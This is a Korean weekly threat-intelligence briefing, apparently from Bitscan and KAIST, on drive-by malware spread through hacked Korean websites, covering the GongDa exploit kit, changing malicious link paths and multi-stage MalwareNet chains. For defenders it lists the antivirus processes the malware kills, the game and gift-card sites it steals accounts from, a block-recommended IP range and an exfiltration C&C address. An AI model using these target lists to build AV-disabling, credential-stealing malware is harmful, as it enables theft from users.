태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

 

[빛스캔+KAIST] 11 2주차 브리핑



 

 

한국 인터넷 위협분석 보고서( 악성코드 유포 전략 고도화 )

 

빛스캔과 KAIST 정보보호대학원이 공동 운영하는 보안정보 제공 서비스 11 2주차 국내 인터넷 환경의 위협 분석내용이며 본 보고서는 PCDS( Pre Crime Detect System )의 탐지역량과 KAIST 정보보호대학원의 분석역량이 결집된 분석 보고서입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응 방안 제시를 하고 있습니다.

본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영되고 있습니다. 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

 

         1.       악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

         2.       악성링크가 공격에 활용에 활용하는 주된 취약성에 대한 내부 보안 강화 정책패치

         3.       내부 감염된 APT 공격의 확인 및 제거에 활용(기술 분석 문서 참고)

 

보고서 내용 중에 기술분석 보고서에는 악성링크의 유형과 실제 감염을 시키는 악성코드의 타입에 따라 보고서가 기술되어 있습니다. 각각은 별개이므로 악성링크(사용자 PC에 악성코드를 내리기 위한 공격코드)에 대한 분석과 실제 악성코드 행위와 기능에 대한 분석 시에 참고 하세요. 각각의 악성링크의 분석에는 최종 다운로드 되는 악성코드까지 기술이 되어 있습니다.

 

 

Summary

 

11 1주차에 대규모로 발견된 C&C 연결을 시도하는 봇넷 에이전트의 경우 금주차에는 감소된 형태를 보이고 있습니다. 그러나 이미 뿌려져서 감염이 된 상태의 좀비 PC들이 상당한 수치에 이를 것이므로 추가 피해를 예방하기 위해 11 1주차에 제공해 드린 C&C 서버들의 주소는 반드시 차단을 하고 네트워크 장비를 이용하여 해당 URL IP로 접속하는 PC가 있을 경우 내부적으로 분석 및 추가 피해 방지를 위해 충분한 조치를 취하시기 바랍니다. 백신 점검으로는 되지 않으며, 초기화가 바람직한 형태가 될 것입니다.

 



<이전과 다르게 금요일보다 토,일요일 집중 공격>

 

공격자들은 악성코드를 유포한 후 비정기적이며 수시로 계속해서 변경하고 있습니다. 자신들의 다단계유포망(MalwareNet)이 탐지되고 있다는 것을 느낀다는 반증입니다. 탐지되고 있다는 것을 느끼기에 악성링크를 토, 일요일에 집중적으로 변경하였습니다.

 



<111주차까지 사용되었던 /pic/img.js 악성링크 구조>

 



<11 2주차에 사용된 새로운 패턴 /home/psd.js - 이제 다시 바뀌겠죠?>

 



<img.js 내용, 중복감염방지, 각 취약점별 세부 분기하는 페이지, 통계 페이지 삽입>

 

금주에는 공격자들이 2011 3월부터 2012 11 1주차까지 1 8개월동안 사용했던 /pic/img.js 라는 구조를 /home/psd.js 라는 구조로 변경하였습니다. 빛스캔에서 매주 공격에 사용되었던 악성링크 주소를 공개하니 자신들의 공격이 탐지되고 있다는 것을 느끼고 변경한 것으로 판단됩니다.

img.js 페이지에는 중복감염을 방지하며 각 취약점별 세부 분기하는 페이지와 통계 페이지가 삽입되어 있습니다. psd.js 또한 마찬가지이며 이름만 변경하였습니다. 일부 웹방화벽에서 ‘img.js’ 를 탐지하여 차단하기 때문으로 판단 됩니다.

 



<11 1주차까지 사용되었던 EGIHosting 호스팅 업체>

 



<11 2주차에 사용된 새로운 DCS Pacific Star 호스팅 업체>

 

악성링크 디렉토리명과 파일명이 바뀌었고 악성코드를 업로드 시켜놓는 주 Hosting 업체까지 변경한 것을 알 수 있습니다. 이는 빛스캔에서 매주 발행하는 구독 서비스를 활용하여 각 기관 및 기업에서 해당 Hosting 업체 IP를 모두 접속 차단하였고 이에 공격자들은 악성코드 감염 수치가 급감하는 것을 파악하고 주 Hosting 업체를 변경한 것으로 판단 됩니다.

 



<국내 사이트에 직접 악성코드 업로드>

 

Hosting 업체를 바꾼 것으로도 모자라 국내 웹 사이트를 해킹하고 그 곳에서 악성코드를 유포하고 있습니다. 이렇게 할 경우 국내 정상 사이트 링크로 오인될 확률이 높습니다. 또한 신뢰받는 사이트일 경우 화이트리스트로 등재되어 탐지 및 보호 도구들을 우회하는 사례가 많습니다. 이렇게 공격자들은 점점 지능적으로 변하고 있습니다. 이에 맞추어 국내에서는 어떠한 실질적인 대책이 있는지 뒤 돌아봐야 할 때입니다.

 

중국에서 작성된 것으로 알려진 일명 공다팩(GongDa Pack)을 이용한 악성코드 유포가 꾸준히 사용되고 있습니다. PCDS 통계에 따르면 해당 웹 익스플로잇 툴킷은 2012년 초부터 사용되고 있으며, 2012 11월 현재까지 전체 공격의 대부분을 차지할 정도로 그 활용이 지속적으로 증가하고 있습니다. 일반적으로 웹 익스플로잇 툴킷은 해당 툴킷의 내부에서 사용되는 특정 변수명에 의해 그 이름이 명명되는데, 공다팩은 중국어로 공격을 의미하는 ‘gong da’변수가 툴킷 내부에 존재하는 특징을 지닙니다.

 

기타 공다팩은 다음과 같은 특징을 가집니다.

 


* 본 브리핑에서는 생략합니다.



향후 공다팩의 활용은 꾸준히 지속될 것으로 예상되므로, 웹방화벽(WAF, Web Application Fireall) 등에서 해당 문자열이 포함된 페이지를 필터링하는 등의 조치가 필요해 보입니다.

 

현재 빛스캔에서 탐지하는 유형은 단순히 이메일을 통한 타켓형 APT가 아닌 웹서비스를 방문하는 모든 방문자를 대상으로 한 대규모 유포이며, 확산도가 높아서 위험성이 높은 상태입니다. 따라서 기업/기관별로 인터넷 접근시에 많은 보호대책을 적극 반영 하여 대응을 하셔야 할 것으로 보입니다. 기존 악성코드들의 분석 결과도 단순 게임계정 탈취에서 계속 변화하는 형태를 보이고 있어 앞으로의 변화를 가늠하기 어려운 상황입니다. 이미 농협의 사례를 통해 APT나 내부망을 공격 하는 악성코드가 가진 위험성과 파괴력은 충분히 경험을 한 상태이므로 현재 웹서비스를 통해 감염시도를 하는 악성코드 자체의 위험성은 높은 수준이라 할 수 있습니다.

 

금주 공격의 특징을 정리하면 다음과 같습니다.

 

          제로보드 4.X 악성코드 유포를 위한 공격 다수 발생(절차와 후폭풍)

          9 4주차, 10 2주차, 11 1주차 이후 또다시 DDoS 공격 수행 악성코드 유포

          공격자들의 악성링크 주소 패턴 변경(/pic/img.js -> /home/psd.js, 빛스캔에서 매주 발행되는 구독 서비스를 통해 악성코드 유포 대역 IP 차단 결과)

          SNS 마케팅으로 인한 악성코드 파급력 확대(미스터피자)

          웹방화벽에서 JXXX 0.44 VIP, Ysxx 0.11  문자열 포함된 페이지 필터링 필요 (일부 생략)

          8 3주차 대거 관찰된 루트킷, 백도어 유형의 경우 금주 차 활동 계속부가적인 위험 증가(감염된 좀비PC들을 활용한 추가 위험이 발생할 수 있는 상태)

          APT 형태의 악성코드 유포 계속 - 권한 획득, 내부망 스캔, 추가 코드 다운을 위한 다운로더 다수 확인 지속

          MalwareNet( 다단계 유포통로)을 적극 활용한 루트킷 및 백도어의 유포 시도 활성화 적극적 으로 이용됨 - 목록은 정상 서비스 구독 고객에게 제공됨


          3.4 7.7 DDos 형태와 유사성을 지니는 다운로더 발견 ( 긴장을 늦춰선 안되겠습니다. 당장이라도 발생 가능한 상황입니다. 1:29:300 하인리히의 법칙을 상기하시기 바랍니다. 이미 대형사고가 발생하기 위한 전제조건은 모두 갖추어진 상황입니다. )

          최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태 및 다양한 취약성을 공격하는 복합적인 형태의 악성링크 공격 확대 계속. 다단계 유포 형태를 띄고 있으며, 탐지 및 추적에 어려움이 예상됨

          백신에 탐지 되지 않는 다운로더 및 백도어 형태의 악성코드 유포 계속

          게임 계정 이외에 문화상품권 및 게임 머니 거래 사이트에 대한 계정 탈취 형 악성코드 계속

          백신 업데이트 IP 주소 목록을 내장한 악성코드 발견 계속. 향후 추가적 피해 예상됨

          

* 사용자가 특정은행 접속시에 피싱 사이트로 유도하거나 HTML 내용을 변경하여 정보를 획득하는 형태의 악성코드들도 현재 다수 유포 되고 있는 온라인 게임 계정 탈취형 악성코드에 붙여진 부가기능이며 해당 기능들은 매우 적극적으로 이용이 되고 있습니다. 악성코드 확산을 통제할 수 있는 근본적인 대안과 대책들이 집중적으로 필요한 부분이라 할 수 있습니다.

 

* 최근 언론상에 많이 나타나고 있는 은행권에 대한 Host file 변조를 통한 피싱 공격은 이미 5, 6월 정보제공 서비스에서 언급을 드렸던 부분으로서 당시 상당수의 악성코드가 유포 되었을 것으로 추정되며, 이후 피해가 지금에서야 계속 드러나는 것으로 볼 수 있습니다. 백신들에 대한 업데이트 주소 변경 내용들도 마찬가지 입니다. 예상대로 직접적인 ARP 스푸핑 공격코드 출현하였으므로 피해 발생이 예상되며, 지금까지 설명한 사항 모두 이미 악성코드의 유포 단계에서 사전 분석되어 정보 제공이 된 내용입니다.

 

 

기사화

 

지난주에도 미스터피자의 홈페이지에서 악성코드 유포하는 것을 환기 차원에서 공개하였지만 또다시 악성코드가 유포되었습니다. 미스터피자의 경우 SNS를 사용하여 고객들을 끌어모으기 때문에 파급력이 상당할 것 같아 한 번 더 기사화[1]를 하였습니다.

 



<미스터피자 홍보를 위한 SNS 마케팅 화면. 그러나 해당 홈페이지에 악성링크가 숨겨져 있을 경우 이러한 SNS 마케팅은 홈피 방문을 대량으로 유도함으로써 소비자와 기업 모두에게 큰 피해를 끼칠 수 있습니다.>

 

호주에서는 피자헛이 해킹을 당해 고객 정보 24만건 유출을 했다는 기사[2]입니다. 이래저래 패스트 푸드 업체 해킹이 부쩍 많이 늘었습니다.

 

니들이 해킹을 알어?

 

니들이 해킹을 알어?’ 는 국내 보안 현실을 알리기 위함입니다. 전체적인 범위 위주로 일반인들도 알기 쉽게 보안 용어들을 최대한 쉽게 풀어 작성하였습니다.

 

※ ‘니들이 해킹을 알어?’ 라는 제목에 민감하신 반응을 보이시는 분들이 있을 것 같아 미리 밝혀 둡니다. 독자들을 무시하려고 하는 것이 아니라 현재의 문제점을 정확히 보여드리기 위해 약간 민감한 단어를 사용한 것입니다. 다른 뜻은 없으니 독자들의 넓은 마음으로 이해 부탁 드립니다.

 

니들이 해킹을 알어? - 1

니들이 해킹을 알어? - 2부 (Know your Enemy)

니들이 해킹을 알어? - 3부 (Know your Enemy - Use)

 

MalwareNet ( 범위와 변화)

 

- MalwareNet: 공격자들이 공격효과를 높이고 탐지를 회피하기 위해 활용하고 있는 악성코드 유포 네트워크를 의미합니다. 일반적인 사이트에 악성링크를 직접 입력하는 것이 아닌 몇 단계를 거친 링크들을 입력하여 추적을 회피하고 악성코드 유포 효과를 극대화 하기 위해 사용되는 프레임을 MalwareNet으로 정의하고 있습니다. , 단 한번 악성링크의 내용을 변경하면 최대 300에서 최소 10여 곳에 이르기까지 동시에 동일한 악성코드 유포가 발생되는 상황을 나타내고 있습니다.

 

다단계유포망(MalwareNet)은 유통구조 패러다임의 혁신입니다.

우리가 주변에서 자주 볼 수 있듯이 우리가 '김치'를 먹기 위해서는 생산자가 밭에 배추 씨를 뿌립니다. 배추가 병충해 피해를 입지 않도록 잘 관리 후에 농수산물 도매시장에 판매합니다. 도매시장에서는 도매상들이 경매를 통해 큰 단위로 배추를 삽니다. 도매상들은 소매상들에게 다시 판매를 합니다. 소매상들은 다시 소비자들에게 판매합니다.

우리나라의 복합적인 유통 생태계입니다. 각 생산자,   도매상, 소매상 등의 중간 마진, 유통시간 등이 포함되어 있습니다.

 

생산자 : 농부

도매상 : 농수산물 도매시장(가락시장)

소매상 : 소매점포(일반 과일 가게)

소비자 : 일반 구매자

 



<악성코드 유포 패러다임과 유통 생태계(피라미드)>

 

하지만 현재 온라인에서 공격자들이 행하는 악성코드 유포는 유통구조의 근본적인 패러다임을 바꾸어 놓고 있습니다.

오프라인 유통 구조에서는 배추 씨앗을 뿌리고 수확하는데 일정한 주기(몇 개월)가 필요합니다. 하지만 온라인에서는 씨앗(악성코드)을 뿌림과 동시에 자라납니다. 그리하여 씨앗은 언제든지 변경할 수 있습니다.

 

중간마진 Zero, 유통시간 Zero, 판매효과는 즉시 ( 최소 10명중 6명에게는 강제판매 가능 )

생산자 : 최종 악성코드

도매상 : MalwareNet(동일한 경로를 활용한 유포 통로)

소매상 : 악성코드 경유지(언론사나 파일 공유 사이트 등)

소비자 : 방문자

 



<MalwareNet 다단계 악성코드 유포 경로>

 

본 정보제공 서비스에서는 MalwareNet의 특성상 대규모 피해가 상시적으로 발생될 수 있으므로 상위 리스트에 한해 부분 공개를 하고 있습니다.

 

MalwareNet을 통해 영향력을 가지는 악성링크들은 탐지 회피를 위해 비정기적이고 수시로 변경됩니다. 금주 차에서는 사후 대응으로는 탐지할 수 없는 형태인 MalwareNet의 활용 사례를 살펴 보겠습니다. 공격자의 의도에 의해 조종당하고 있는 현실에서 사후대응과 사전대응의 차이는 매우 큰 차이를 가질 수 밖에 없으며 , 선제적인 사전대응이 얼마나 중요한지 확인 할 수 있습니다. MalwareNet 자체를 여러 곳 활용하는 형태도 전주에 이어 계속 발견되고 있으며, 금주에는 xxxxxxxx.kr/com.js 이 적극적으로 이용이 되고 있는 상황입니다.

 

현재 시간에도 영향력을 유지하고 있으므로 대응이 필요하며 수시로 최종 악성코드들이 변경되고 있어서 탐지 및 대응에 어려움이 있을 것으로 판단됩니다. 최종 악성코드들에 대한 탐지율도 높지 않아 항상 위험에 노출 되어 있는 상태라 볼 수 있습니다. 단기간에 대규모 유포망 구축을 하는 형태가 끊임없이 관찰이 되고 있습니다. 주중에는 통계정보를 수집하고 간헐적으로 공격에도 이용 되고 있는 형태를 보이고 있습니다. 평상시에는 해당 링크가 존재하지 않다가 공격 시점에만 활성화되고 있는데 이 점은 공격자가 해당 서비스에 대한 완벽한 권한을 행사하고 있음을 의미 합니다. 단순한 링크 삭제로는 해결책이 되지 않음을 염두에 두어야 할 것입니다.

 



<MalwareNet 파급력>

 

현재 다단계유포망(MalwareNet)인 xxxxxx.co.kr/com.js 에 들어있는 곳은 단 2곳이지만 이곳도 또 다른 다단계유포망(MalwareNet)입니다. 한 번 악성코드를 변경하게 되면 37 + 36 73곳의 웹사이트에서 일제히 변경됩니다. 그만큼 공격자들은 손 쉽게 공격을 하고 있습니다.

 

*PCDS Impact Factor는 내부 수집된 체계에서 전파 범위를 고려한 내부 위험지수이며 MalwareNet의 추적과 영향도 추적을 위해 활용되는 수치입니다. 높을수록 은밀하면서도 파급력이 높은 상태라는 점을 의미하고 있습니다.

 

현재의 상황은 사용자 PC에 설치되는 악성코드들은 항상 백신을 우회해서 설치가 되고 또 계속해서 변형들이 출현하고 있는 현 상황에서 웹 서핑만 해도, 웹 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐하고 있습니다. 기본적인 문제를 해결할 수 있는 보안패치는 반드시 적용해야만 위험을 줄일 수 있으니 반드시 기관/ 기업 내부적으로 강력한 권고가 되어야 합니다. Oracle Java취약성, Adobe Flash 취약성, MS XML, Midi IE 취약성이 복합적으로 사용되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록 등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰되고 있어서 위험성이 높습니다. 또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하시기 바랍니다.

 

기술 분석 보고서에 전체 URL이 공개된 국내 사이트들은 악성링크로 직접 이용 되거나 최종 악성코드가 다운로드 된 곳들의 주소는 여과 없이 공개가 되고 있으니 참고하시고 금주 차에는 언론사 및 국내 기업, 기관들의 주소가 직접 기술 되어 있습니다.

 

기술분석보고서에 언급된 게임계정 유출 악성코드들은 전체 악성코드의 80% 이상이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있습니다. 현재 가장 다수를 차지하는 게임계정 탈취형 악성코드들이 변화된 형태를 보이고 있으며 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 계속 되고 있습니다. – 8 2주차 부터 관찰된 변화는 금주 차에도 계속 강도가 높아지고 있어서 즉시적인 대응책이 지금 당장 필요합니다.

 

 

PCDS(Pre-Crime Detect System) 탐지 내역

 

PCDS 상에서는 최초 악성링크 탐지와 MalwareNet에 대한 추적, 최종 악성파일에 대한 수집까지 같이 운영이 되고 있습니다.

 

PCDS에 탐지된 내용을 바탕으로 하여 공격자들의 전략을 확인해 보면, 비정기적이고 수시로 악성링크와 최종 악성코드를 바꾸고 있습니다. 변경하는 이유는 백신 탐지 회피를 하기 위한 목적이 가장 크며, 때로는1시간에 한 번씩 최종 악성코드를 변경하는 지금의 상황에서 대응이 가능한 보안체계는 거의 없습니다. 백신은 백신만의 역할 부분이 있으며, 현재 상태의 문제 해결을 위해서는 확산 이전에 대응을 할 수 있어야 합니다. 최종 설치되는 바이너리의 변화는 계속 되고 있으므로, 대응적인 측면에서 한계를 보일 것으로 판단됩니다.

 



<모두 한 그룹의 공격이라는 것을 확인>

 

악성링크는 각각 다르지만 최종 악성코드를 다운받는 주소가 모두 같은 것으로 보아 한 그룹의 공격이라는 것을 확인할 수 있습니다. 단 하나의 공격 그룹에 의해 국내 웹 사이트들은 방문자들에게 악성코드를 대규모로 유포하고 있습니다. 이것이 무엇을 의미하는 것일까요? 사이버 세상에서 단 한 그룹의 공격을 국내의 수 많은 보안 전문가들은 막아내기 급급합니다.

또한 현재 보이는 xxxxxxxxg.com, xxxxx79.com은 다단계유포망(MalwareNet)로써 여러 사이트에 들어가 있기에 파급력이 훨씬 큽니다.

 



<몽골기병, 사이버 몽골 기병이 몰려오고 있다.(이미지 출처 http://www.mongolfilm.ru)

 

서기 1241년 몽골의 칸인 바투는 헝가리의 왕에게 항복을 하라는 서신을 보냅니다. 이에 헝가리 왕은 교황에게 구원을 요청했지만 몽골군의 도착이 더 빨랐습니다. 유럽 최강국이었던 헝가리의 군사들과 유럽 최정예 연합 기사단 등 20만 대군은 몽골군의 침입에 대항했고 결과적으로 처참하게 패하여 몽골의 악몽을 깊이 새기게 됐습니다. 일설에 따르면 몽골 장수인 제베가 이끄는 2천명의 기병이 10만의 기사단을 라이프찌히에서 몰살시켰다고도 합니다. 사실여부를 떠나 그만큼 강력한 군사력으로 상대를 압도했다는 것이 중요합니다. 총 인구 100만에 가용 가능한 병사수가 20만인 몽골은 어떻게 대제국을 이루게 됐을까요? 또 중세 유럽의 강력한 왕권국가들이 왜 그들에게 무릎을 꿇을 수 밖에 없었을까요?  전술이 없고 전략이 없는 병력은 그 규모가 크더라도 제물이 될 수 밖에 없음을 이미 역사에서도 증명하고 있습니다. 그러나 유럽의 기사단 연합은 동시대 최고의 역량과 조직화된 집단이었다는 점에서 차별성을 가지고 있습니다. 지금의 IT 환경에서 공격과 방어의 입장은, 유럽의 기사단 연합과 몽골군과의 대결에 깊은 유사성을 가지고 있습니다.

이 글은 지디넷에 기사화[3]가 되어 있으니 참고하시기 바랍니다.

 

* 최종 바이너리 수집의 경우 체크섬 값이 다르거나 변경이 되었을 때 수집이 되도록 되어 있으며 위의 항목은 빠르면 1시간 이내에도 최종 파일을 변경하는 형태를 직접 볼 수 있습니다. 이와 같은 악성코드들이 순식간에 수십여 곳의 서비스를 통해 즉시 감염을 시키고 있는 것이 현실입니다. 공격자들의 전술과 기동력은 타의추종을 불허합니다. 그 반면 대응은 어떤가요? 현재의 실상은 과연 어떨까요?

 

지금 분석되고 예상되는 모든 내용들은 지금 이 순간에도 발생하고 있는 현실입니다. 사건이 발생 된 이후에는 돌이키기 어렵듯이 사전 탐지와 사후 대응은 전혀 다른 범위입니다. 사전에 얼마나 대응을 하느냐가 가장 중요하며, 빠른 정보를 확보하여 대규모로 유포된 악성코드에 대응 할 수 있도록 사후대응 측면에서도 현재 수준 보다는 강도 높은 방안들이 절실히 요구됩니다.

 

 

게임 계정 탈취 및 백신 Kill, 게임 머니 및 아이템 거래 사이트 계정탈취 계속

 

본 내용은 최근의 악성코드들이 기본적으로 탑재하고 있는 기능이며 6 4주차 까지 발견 되었던 백신과 게임 계정 탈취 이외에도 문화상품권과 게임 머니 사이트에 대한 계정 탈취 기능이 추가 되었습니다모든 기능은 BHO 관련된 공격에 연관 되어 있으며 해당 문제들은 이전 보고서에 첨부된 BHO 공격에 대한 전문분석 자료를 참고 하세요. ( 정식구독 기업/기관 대상)신규 가입 및 최근가입으로 인하여 전문분석 보고서를 받지 못한 곳들은 본 메일로 회신을 주시면 전달 드리겠습니다.

 

9 1주차부터 신용정보 조회, 아이템 매니아, 아이템 베이 사이트까지 계정 탈취 기능이 추가 되었습니다. 신용정보 조회 사이트에서 자신의 신용정보를 검색하다가는 자신의 개인정보가 노출될 수도 있습니다. 또한 아이템 매니아, 아이템 베이 사이트는 온라인 게임 아이템 거래 사이트입니다. 게임 계정을 탈취해서 아이템을 판매하던 공격자들이 이제는 게임 계정 탈취 이외에도 게임 아이템 거래 사이트까지 노리고 있습니다돈이 되는 곳은 모두가 대상이 되어 있는 상태입니다. 다른 모든 기기와 장비들에서도 금전화가 가능한 순간부터 현재의 공격 수준은 그대로 확장이 될 것입니다. 아직은 때가 안되었을 뿐입니다. 그 때는 머지 않았습니다.

 

1.        백신 무력화

 

프로세스명

프로그램명

sgbider.exe, vcsvc.exe, vcsvcc.exe

바이러스체이서

NVCAgent.npc, Nsvmon.npc, Nsavsvc.npc, NVC.npc, NaverAgent.exe

네이버백신

V3sp.exe, V3svc.exe, V3up.exe, MUpdate2.exe, SgSvc.exe, Sgui.exe, SgRun.exe, InjectWinSockServiceV3.exe, V3Light.exe, V3LTray.exe, V3Lsvc.exe, V3LRun.exe

AhnLab V3

AhnLab V3 Lite

AhnLab SiteGuard

AYUpdSrv.aye, AYRTSrv.aye, SkyMon.exe, AYServiceNT.aye, AYupdate.aye, AyAgent.aye

알약 (ALYac)

avp.exe

Kaspersky

avgnt.exe, avcenter.exe, avguard.exe, avscan.exe, avupgsvc.exe

Avira AntiVirus

avwsc.exe, AvastSvc.exe, ashUpd.exe, AvastUI.exe

avast!

shstat.exe, Mctray.exe, UdaterUI.exe

McAfee

msseces.exe

MSE

egui.exe, ekrn.exe

ESET NOD32

ccSvcHst.exe, Navw32.exe

Symantec Norton

updatesrv.exe, vsserv.exe, seccenter.exe, bdagent.exe, bdreinit.exe

BitDefender

avgam.exe, avgemc.exe, avgnsx.exe, avgrsx.exe, avgfrw.exe, avgwdsvc.exe, avgupd.exe

AVG

PCOTP.exe

넥슨 OTP

 

2.        게임 계정 탈취

 

프로세스명

프로그램명

gamehi.co.kr

게임하이

hangame.com, id.hangame.com

한게임

laspoker.exe

한게임 라스베가스포커

duelpoker.exe

한게임 맞포커

hoola3.exe

한게임 파티훌라

highlow2.exe

한게임 하이로우

poker7.exe

한게임 7포커

baduki.exe

한게임 로우바둑이

ExLauncher.exe, TERA.exe, tera.hangame.com

테라

netmarble.net

넷마블

pmang.com

피망

ff2client.exe, fifaonline.pmang.com

피파 온라인2

Raycity.exe

레이시티

www.nexon.com, login.nexon.com

넥슨

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe, dragonnest.nexon.com

드래곤 네스트

baramt.exe, WinBaram.exe, baram.nexon.com

바람의 나라

mabinogi.nexon.com, heroes.nexon.com, heroes.exe

마비노기 영웅전

MapleStory.exe, maplestory.nexon.com

메이플 스토리

x2.exe, elsword.nexon.com

엘소드

dk.halgame.com, dkonline.exe

DK 온라인

clubaudition.ndolfin.com

클럽 오디션

www.capogames.net, samwinfo.capogames.net

삼국지w

fairyclient.exe

로한

plaync.co.kr

엔씨소프트

bns.plaync.com

블레이드 & 소울

lin.bin

리니지

AION.bin, aion.plaync.jp

아이온

kr.battle.net

블리자드 배틀넷

wow.exe

월드 오브 워크래프트

Diablo III.exe

디아블로III

 

 

3.        게임 머니 & 게임 아이템 & 문화상품권 계정 탈취

 

사이트 주소

사이트 이름

www.booknlife.com

북앤라이프

www.cultureland.co.kr

컬쳐랜드

www.happymoney.co.kr

해피머니

www.teencach.co.kr

틴캐시

auth.siren24.com

신용정보 조회

itemmania.com

아이템 매니아

www.itembay.com

아이템 베이

 

* URL의 경우는 브라우저 상에서 BHO (Browser Helper Object)로 등록이 되어 모니터링을 하다가 해당 URL로 주소가 입력이 되거나 접속이 될 경우에 html 내용을 변조 하거나 계정에 관련된 키 입력값을 빼내도록 고안이 된 상황입니다.

 

 

차단 권고 대역

 

아래 영역은 이미 공격자가 권한을 통제하고 있는 IP대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재 활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각 기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다. 악성링크에 이용 되는 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해 강력한 차단을 유지하실 것을 권고 합니다.

 

          기술 분석 보고서에는 별도의 차단 대역들을 제공하고 있으므로 참고하시기 바라며, 사안별로 모니터링 및 차단에 적극 활용 바랍니다.

          국내 통신사의 경우 C Class가 아닌 직접 IP를 등록 하였으며 이미 공격자가 권한을 가진 상태에서 악성코드 유포 경로로 직접 활용하고 있는 상태여서 제한적인 차단이 필요하며, 업무와 연관성이 있는지 여부는 각 기업 및 기관에서 잘 판단 하셔서 차단에 활용하시기 바랍니다. 9 4주차부터 차단 권고 대역은 최근 1~2개월을 기준으로 전달 드리도록 하겠습니다. 이전의 차단 목록이 필요한 기업 및 기관은 로 요청해 주 세요.

 

- 182.16.9.X, SIMCENTRIC SOLUTIONS LIMITED, HONG KONG 11/2



* 한곳만 예시로 공개함. 

 

악성코드 감염 이후 접속 URL - 차단 및 모니터링 필요한 부분

 

본 내용은 악성코드가 PC에 감염된 이후에 외부로 연결 시도를 하고 명령을 받는 주소들입니다. C&C 연결 을 시도하는 봇넷과 같은 개념으로 볼 수 있습니다. C&C 서버의 차단과 관련된 핵심적인 내용입니다. 차후 별도 차단 서비스를 기획하고 있으며 해당 내용은 별도 서비스 확산 시에 보고서 상에서만 일부 제공될 예정입니다. 실험적으로 Outbound 연결 시에 Destination IP가 본 URL일 경우는 100% 좀비 PC및 백도어, 루트킷 등에 감염된 것이므로 직접 내부망에서 감염된 좀비 PC를 찾아내는 것이 가능해 집니다. 기술 분석 보고서 내에는 추가적인 차단 정보들이 존재함으로 확인 하시고 적용 하시는 것이 필요합니다.

 

특정 URL로 접속하여 추가 명령 대기


생략

 

사용자 PC에서 획득한 정보를 유출


http://204.16.192.16


* 한곳만 예시

 

추가로 악성 파일을 다운로드


생략

 

* 붉은색으로 선택된 도메인들은 모두 현재 다수가 국내 환경에 뿌려져 있는 다운로더 및 C&C 서버로 이용되는 파일 및 도메인들입니다. 해당 도메인은 불시에 활성화 되어 추가적인 피해가 계속 될 수 있으므로 본 메일을 받으시는 기관 및 기업에서는 그에 맞는 대응을 하시기 바랍니다. 기업은 해당 도메인으로 접속하는 PC가 있을 경우 이미 좀비 PC화가 되었으므로 절차에 맞게 처리를 하시면 되고 국가기관 차원에서는 차단 정책을 즉시 수행 하여야 할 것으로 보입니다.

 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 금주의 총평으로는 빛스캔 구독 서비스에 의해 악성링크 유포 패턴 변경, 웹방화벽에서 난독화 버전 문자열 필터링 요망, 언론사, 파일공유, 커뮤니티 등을 통한 악성코드 유포이슈, 장기간 악성코드 유포에 활용 되지 않았던 웹서비스들에서의 악성코드 유포상황, 거의 대부분의 외부 연결을 시도하는 악성코드들 대부분이 C&C 서버와 연결하는 형태를 꼽을 수 있습니다. 향후 대형사고가 일어날 것 같은 하인리히의 법칙에서 의미하는 위험시그널 수치는 계속 증가 중입니다. 민감한 시기입니다. 적극적인 대응과 노력으로 피해를 예방해야 합니다. MalwareNet의 활용과 위험에 대해 계속 언급 하였습니다. 그리고 지금 관찰되는 상태는 최종 악성코드의 성격과 범위 모두 일정 수준의 임계치를 넘은 상황입니다.

 

2년 이상을 온라인상에서 꾸준히 공격을 시도하고 있는 공격자들을 모니터링 한 결과에 따르면 공격기법과 기술은 한 주가 다르게 변화하고 진화하고 있습니다. 그 반면에 대응 기술 측면에서는 발전은 지지부진함을 보이고 있습니다. 공격은 적극적인 유포망 확대, 감염 기술의 고도화, 최고 공격기법들의 즉시적인 실전투입으로 귀결이 됩니다.

 

 

발전적인 협력

 

빛스캔의 PCDS에 탐지 및 분석되는 정보들은 현재 최초의 악성링크, 악성링크의 구조정보, 최종 악성파일 보관, 악성파일 변화 관찰, 봇넷 구축을 위해 감염 이후 연결 시도하는 C&C 서버의 정보들이 수집 및 축적되고 있으며 각 부분별로 발전적인 협력을 원하시는 부분에 대해서는 메일로 문의를 주시면 답변 드리겠습니다. (info@bitscan.co.kr)

감사합니다.

 

